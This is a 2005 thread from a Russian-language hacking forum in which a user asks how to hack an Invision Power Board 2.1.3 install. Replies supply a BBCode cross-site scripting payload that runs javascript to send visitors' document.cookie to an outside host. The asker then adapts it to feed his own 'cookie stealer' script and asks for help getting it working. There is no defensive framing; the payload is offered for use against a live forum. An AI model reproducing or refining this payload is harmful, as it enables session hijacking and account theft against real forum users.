HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Forum for discussion of ANTICHAT
Перезагрузить страницу ipb question
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

ipb question
  #1  
Старый 27.12.2005, 06:27
caffine2
Новичок
Регистрация: 11.08.2005
Сообщений: 6
С нами: 10920260

Репутация: 0
По умолчанию ipb question
iS their a way to exploit Invision Power Board v2.1.3 and hack it?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 27.12.2005, 12:00
Barsik
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
С нами: 11217926

Репутация: 726
По умолчанию
No sploit
but it have XSS
Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
 
Ответить с цитированием

  #3  
Старый 27.12.2005, 17:29
caffine2
Новичок
Регистрация: 11.08.2005
Сообщений: 6
С нами: 10920260

Репутация: 0
По умолчанию
Hmm they must have patched it becuase everything before .com get's filterd out, and you see the xss?

.com">wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
 
Ответить с цитированием

  #4  
Старый 27.12.2005, 17:37
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами: 11269766

Репутация: 345


По умолчанию
this bug only for IE
 
Ответить с цитированием

  #5  
Старый 27.12.2005, 21:28
caffine2
Новичок
Регистрация: 11.08.2005
Сообщений: 6
С нами: 10920260

Репутация: 0
По умолчанию
oooo, i get it except i have 1 more question,
Код HTML:
[email]black@bandit[url=http://www.google.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://mysite/webmaster/cookie32.php?"+document.cookie);`
and for some reason it's not directing it to my cookie stealer i'm guessing it's due to the document.images, so in order for this to work do i need to make a dynamic signature?
Последний раз редактировалось caffine2; 27.12.2005 в 22:07..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
La question selon cmd Vandal Болталка 12 06.08.2005 19:20
First Time Poster. Have a Question bruno168 Болталка 1 16.05.2005 20:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...